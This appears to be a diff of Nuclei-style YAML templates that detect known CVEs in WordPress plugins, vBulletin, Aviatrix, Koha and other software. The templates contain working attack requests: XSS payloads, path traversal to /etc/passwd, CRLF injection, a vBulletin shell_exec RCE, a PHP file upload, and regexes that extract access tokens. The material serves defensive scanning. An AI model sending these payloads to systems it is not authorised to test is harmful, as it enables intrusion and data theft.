- https://nvd.nist.gov/vuln/detail/CVE-2014-4539
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2014-4539
|
||||
cwe-id: CWE-79
|
||||
description: "Cross-site scripting (XSS) vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "'><script>alert(document.cookie)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2014-4550
|
||||
|
||||
info:
|
||||
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4550
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2014-4550
|
||||
cwe-id: CWE-79
|
||||
description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter."
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "'><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2014-4558
|
||||
|
||||
info:
|
||||
name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4558
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2014-4558
|
||||
cwe-id: CWE-79
|
||||
description: "Cross-site scripting (XSS) vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter."
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "'><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2014-4561
|
||||
|
||||
info:
|
||||
name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4561
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2014-4561
|
||||
cwe-id: CWE-79
|
||||
description: "The ultimate-weather plugin 1.0 for WordPress has XSS"
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/ultimate–weather–plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2014-4592
|
||||
|
||||
info:
|
||||
name: WP Planet <= 0.1 - Unauthenticated Reflected XSS
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4592
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2014-4592
|
||||
cwe-id: CWE-79
|
||||
description: "Cross-site scripting (XSS) vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter."
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wp–planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2014-5111
|
||||
|
||||
info:
|
||||
name: Fonality trixbox - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/39351
|
||||
- https://www.cvedetails.com/cve/CVE-2014-5111
|
||||
tags: cve,cve2014,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2014-5258
|
||||
|
||||
info:
|
||||
name: webEdition 6.3.8.0 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/34761
|
||||
- https://www.cvedetails.com/cve/CVE-2014-5258
|
||||
tags: cve,cve2014,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -7,13 +7,13 @@ info:
|
|||
reference:
|
||||
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
|
||||
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2015-1000012
|
||||
cwe-id: CWE-200
|
||||
description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin"
|
||||
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2015-4414
|
||||
|
||||
info:
|
||||
name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/37274
|
||||
- https://www.cvedetails.com/cve/CVE-2015-4414
|
||||
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2015-4632
|
||||
|
||||
info:
|
||||
name: Koha 3.20.1 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/37388
|
||||
- https://www.cvedetails.com/cve/CVE-2015-4632
|
||||
tags: cve,cve2015,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2015-4632
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2016-4975
|
||||
|
||||
info:
|
||||
name: Apache mod_userdir CRLF injection
|
||||
author: melbadry9,nadino,xElkomy,sullo
|
||||
severity: low
|
||||
description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.
|
||||
tags: crlf,generic,cves,cve2016
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2016-4975
|
||||
cwe-id: CWE-93
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
|
||||
part: header
|
|
@ -1,15 +1,20 @@
|
|||
id: openssh5.3-detect
|
||||
id: CVE-2016-6210
|
||||
|
||||
info:
|
||||
name: OpenSSH 5.3 Detection
|
||||
author: iamthefrogy
|
||||
severity: low
|
||||
severity: medium
|
||||
tags: network,openssh
|
||||
description: OpenSSH 5.3 is vulnerable to username enumeration and DoS vulnerabilities.
|
||||
reference:
|
||||
- http://seclists.org/fulldisclosure/2016/Jul/51
|
||||
- https://security-tracker.debian.org/tracker/CVE-2016-6210
|
||||
- http://openwall.com/lists/oss-security/2016/08/01/2
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 5.9
|
||||
cve-id: CVE-2016-6210
|
||||
cwe-id: CWE-200
|
||||
|
||||
network:
|
||||
- host:
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2018-0127
|
||||
|
||||
info:
|
||||
name: Cisco RV132W and RV134W Router Information Disclosure
|
||||
author: jrolf
|
||||
severity: critical
|
||||
description: A vulnerability in the web interface of Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device, which could lead to the disclosure of confidential information.
|
||||
tags: cve,cve2018,cisco,router
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2018-0127
|
||||
cwe-id: CWE-306
|
||||
reference:
|
||||
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2
|
||||
- http://www.securitytracker.com/id/1040345
|
||||
- http://www.securityfocus.com/bid/102969
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/dumpmdm.cmd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Dump"
|
||||
- "MDM"
|
||||
- "cisco"
|
||||
- "admin"
|
||||
part: body
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2019-16759
|
||||
|
||||
info:
|
||||
name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
|
||||
name: RCE in vBulletin v5.0.0-v5.5.4 fix bypass
|
||||
author: madrobot
|
||||
severity: critical
|
||||
reference: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
|
||||
reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vbulletin-remote-code-execution-cve-2020-7373/
|
||||
tags: cve,cve2019,vbulletin,rce
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
|
@ -17,6 +17,7 @@ requests:
|
|||
- raw:
|
||||
- |
|
||||
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
|
||||
|
|
|
@ -1,29 +1,30 @@
|
|||
id: CVE-2019-17538
|
||||
info:
|
||||
name: Jnoj Directory Traversal for file reading(LFI)
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
reference: https://github.com/shi-yang/jnoj/issues/53
|
||||
tags: cve,cve2019,jnoj,lfi
|
||||
|
||||
id: CVE-2019-17538
|
||||
info:
|
||||
name: Jnoj arbitrary local file inclusion (LFI)
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
reference: https://github.com/shi-yang/jnoj/issues/53
|
||||
tags: cve,cve2019,jnoj,lfi
|
||||
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2019-17538
|
||||
cwe-id: CWE-22
|
||||
description: "Jiangnan Online Judge (aka jnoj) 0.8.0 has Directory Traversal for file reading via the web/polygon/problem/viewfile?id=1&name=../ substring."
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
||||
description: "Jiangnan Online Judge (aka jnoj) 0.8.0 has directory traversal (LFI) vulnerability via web/polygon/problem/viewfile?id=1&name=../"
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
||||
|
|
|
@ -1,11 +1,17 @@
|
|||
id: simple-employee-rce
|
||||
id: CVE-2019-20183
|
||||
|
||||
info:
|
||||
name: Simple Employee Records System 1.0 RCE
|
||||
name: Simple Employee Records System 1.0 arbitrary file upload
|
||||
description: Simple Employee Records System 1.0 contains an arbitrary file upload due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or RCE.
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/49596
|
||||
tags: rce,intrusive
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cwe-id: CWE-434
|
||||
cve-id: CVE-2019-20183
|
||||
tags: rce,intrusive,cve,upload,cve2019
|
||||
|
||||
requests:
|
||||
- raw:
|
|
@ -5,7 +5,7 @@ info:
|
|||
severity: critical
|
||||
reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
|
||||
description: |
|
||||
vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
|
||||
vBulletin 5.5.4 through 5.6.2 allow remote command execution (RCE) via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
|
||||
tags: cve,cve2020,vbulletin,rce
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
|
@ -17,6 +17,7 @@ requests:
|
|||
- raw:
|
||||
- |
|
||||
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;"
|
||||
|
@ -29,4 +30,4 @@ requests:
|
|||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
|
|
@ -28,4 +28,4 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- '<groupId>com.atlassian.jira</groupId>'
|
||||
part: body
|
||||
part: body
|
||||
|
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2021-40870
|
||||
|
||||
info:
|
||||
name: Aviatrix Controller 6.x before 6.5-1804.1922. RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
|
||||
reference:
|
||||
- https://wearetradecraft.com/advisories/tc-2021-0002/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40870
|
||||
tags: cve,cve2021,rce,aviatrix
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-40870
|
||||
cwe-id: CWE-434
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /v1/backend1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=HACKERMAN<?php phpinfo()?>
|
||||
|
||||
- |
|
||||
GET /v1/{{randstr}}.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'HACKERMAN'
|
||||
- "PHP Extension"
|
||||
- "PHP Version"
|
||||
condition: and
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2021-40960
|
||||
|
||||
info:
|
||||
name: Galera WebTemplate 1.0 – Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.
|
||||
reference:
|
||||
- http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960
|
||||
tags: cve,cve2021,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2021-41381
|
||||
|
||||
info:
|
||||
name: Payara Micro Community 5.2021.6 Directory Traversal
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Payara Micro Community 5.2021.6 and below allows Directory Traversal
|
||||
reference:
|
||||
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41381
|
||||
tags: cve,cve2021,payara,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.30
|
||||
cve-id: CVE-2021-41381
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "payara.security.openid.default.providerURI="
|
||||
- "payara.security.openid.sessionScopedConfiguration=true"
|
||||
condition: and
|
||||
part: body
|
|
@ -0,0 +1,17 @@
|
|||
id: samba-swat-panel
|
||||
info:
|
||||
name: Samba SWAT panel
|
||||
author: PR3R00T
|
||||
severity: info
|
||||
tags: panel
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'Basic realm="SWAT"'
|
||||
part: header
|
|
@ -0,0 +1,33 @@
|
|||
id: tugboat-config-exposure
|
||||
|
||||
info:
|
||||
name: Tugboat configuration file exposure
|
||||
description: Tugboat is a command line tool for interacting with your DigitalOcean droplets.
|
||||
reference: https://github.com/petems/tugboat
|
||||
author: geeknik
|
||||
severity: critical
|
||||
tags: tugboat,config,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/.tugboat"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "authentication"
|
||||
- "access_token"
|
||||
- "ssh_user"
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- 'access_token: .*'
|
|
@ -0,0 +1,17 @@
|
|||
id: amazon-sns-token
|
||||
|
||||
info:
|
||||
name: Amazon SNS Token Detect
|
||||
author: TheBinitGhimire
|
||||
severity: info
|
||||
tags: file,token,amazon,aws
|
||||
|
||||
file:
|
||||
- extensions:
|
||||
- all
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: amazon-sns-topic
|
||||
regex:
|
||||
- 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+'
|
|
@ -105,15 +105,21 @@ file:
|
|||
regex:
|
||||
- 'import_request_variables'
|
||||
- type: regex
|
||||
# Avoid use of $GLOBALS
|
||||
# Avoid use of GLOBALS
|
||||
regex:
|
||||
- '\\$GLOBALS'
|
||||
- 'GLOBALS'
|
||||
- type: regex
|
||||
regex:
|
||||
- '\\$_GET'
|
||||
- '_GET'
|
||||
- type: regex
|
||||
regex:
|
||||
- '\\$_POST'
|
||||
- '_POST'
|
||||
- type: regex
|
||||
regex:
|
||||
- '_COOKIE'
|
||||
- type: regex
|
||||
regex:
|
||||
- '_SESSION'
|
||||
- type: regex
|
||||
# Ensure the use of type checking validating against booleans (===)
|
||||
regex:
|
||||
|
@ -206,7 +212,7 @@ file:
|
|||
- type: regex
|
||||
# MySQLi Extension
|
||||
regex:
|
||||
- "mysqli((_real)?_connect)?"
|
||||
- "mysqli((_real)?_connect)?|_query"
|
||||
- type: regex
|
||||
# Oracle OCI8 DBMS
|
||||
regex:
|
||||
|
@ -243,3 +249,10 @@ file:
|
|||
# XML document
|
||||
regex:
|
||||
- "x(ptr|path)_new_context"
|
||||
- type: regex
|
||||
# Investigate if GetTableFields is called safely
|
||||
regex:
|
||||
- "GetTableFields"
|
||||
- type: regex
|
||||
regex:
|
||||
- "ini_get.*magic_quotes_gpc.*"
|
||||
|
|
|
@ -5,18 +5,21 @@ info:
|
|||
author: xElkomy
|
||||
severity: high
|
||||
reference: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled
|
||||
description: The PUT method is enabled on the web server, allowing for arbitrary file uploads.
|
||||
tags: injection
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
PUT /testing-put.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/plain
|
||||
|
||||
{{randstr}}
|
||||
|
||||
- |
|
||||
GET /testing-put.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/plain
|
||||
|
||||
req-condition: true
|
||||
|
|
|
@ -0,0 +1,28 @@
|
|||
id: tidb-unauth
|
||||
|
||||
info:
|
||||
name: Unauth TiDB Disclosure
|
||||
author: lu4nx
|
||||
severity: high
|
||||
metadata:
|
||||
zoomeye-dork: tidb +port:"4000"
|
||||
tags: network,tidb
|
||||
|
||||
network:
|
||||
- inputs:
|
||||
- read: 1024 # skip handshake packet
|
||||
- data: b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c # authentication
|
||||
type: hex
|
||||
|
||||
host:
|
||||
- "{{Hostname}}"
|
||||
- "{{Hostname}}:4000"
|
||||
|
||||
read-size: 1024
|
||||
|
||||
matchers:
|
||||
- type: binary
|
||||
binary:
|
||||
# resp format:
|
||||
# 07: length, 02: sequence number, 00: success
|
||||
- "0700000200000002000000"
|
|
@ -0,0 +1,24 @@
|
|||
id: aviatrix-detect
|
||||
|
||||
info:
|
||||
name: Aviatrix Detect
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
tags: tech,aviatrix
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Aviatrix Controller</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,71 @@
|
|||
id: csrf-guard-detect
|
||||
|
||||
info:
|
||||
name: OWASP CSRF Guard detection
|
||||
author: forgedhallpass
|
||||
severity: info
